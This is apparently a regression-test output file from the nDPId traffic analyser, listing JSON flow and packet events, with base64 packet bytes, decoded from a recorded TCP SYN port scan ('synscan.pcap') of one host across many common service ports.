+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAs400AADkGLCWsEAAIQA2GNIzSABfdUoMYAAAAAGACCAAweAAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs0LAAACUGUsKsEAAIQA2GNIzTABfdU4MZAAAAAGACCAAwdQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsjfEAACkGkYGsEAAIQA2GNIzTDT3dU4MZAAAAAGACCAAjTwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs40UAADcGLi2sEAAIQA2GNIzTAIvdU4MZAAAAAGACEAAoAQAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE8AACgG7COsEAAIQA2GNIzTABXdU4MZAAAAAGACBAA0dwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAskg4AAC4GiGSsEAAIQA2GNIzTFwzdU4MZAAAAAGACDAAVgAAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsh\/MAAC8GkX+sEAAIQA2GNIzTAkvdU4MZAAAAAGACEAAmQQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAscq0AACUGsMWsEAAIQA2GNIzTA+PdU4MZAAAAAGACCAAsqQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsocYAACoGfKysEAAIQA2GNIzTBAHdU4MZAAAAAGACDAAoiwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0nYAADMGQvysEAAIQA2GNIzTAG\/dU4MZAAAAAGACEAAoHQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0EcAADoGPiusEAAIQA2GNIzTAMfdU4MZAAAAAGACDAArxQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs+2cAACwGIQusEAAIQA2GNIzTDOrdU4MZAAAAAGACBAAnogAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsTRAAAC8GzGKsEAAIQA2GNIzTAI\/dU4MZAAAAAGACEAAn\/QAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsDXoAAC0GDfmsEAAIQA2GNIzTAbvdU4MZAAAAAGACCAAu0QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsaUIAACsGtDCsEAAIQA2GNIzSBrvdUoMYAAAAAGACEAAh1AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsvHwAADMGWPasEAAIQA2GNIzSA+HdUoMYAAAAAGACEAAkrgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsMtIAACsG6qCsEAAIQA2GNIzSAG7dUoMYAAAAAGACEAAoIQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsXl8AAC8GuxOsEAAIQA2GNIzSH5DdUoMYAAAAAGACEAAI\/wAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsGxAAACsGAmOsEAAIQA2GNIzSBrjdUoMYAAAAAGACEAAh1wAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsWWoAACoGxQisEAAIQA2GNIzSABndUoMYAAAAAGACDAAsdgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs03wAADEGQ\/asEAAIQA2GNIzSAb3dUoMYAAAAAGACCAAu0gAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsszkAADEGZDmsEAAIQA2GNIzSAQDdUoMYAAAAAGACCAAvjwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsKoIAACkG9PCsEAAIQA2GNIzSAirdUoMYAAAAAGACCAAuZQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AACsGyFOsEAAIQA2GNIzSAIfdUoMYAAAAAGACEAAoCAAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DEAADAGREGsEAAIQA2GNIzSABbdUoMYAAAAAGACBAA0eQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 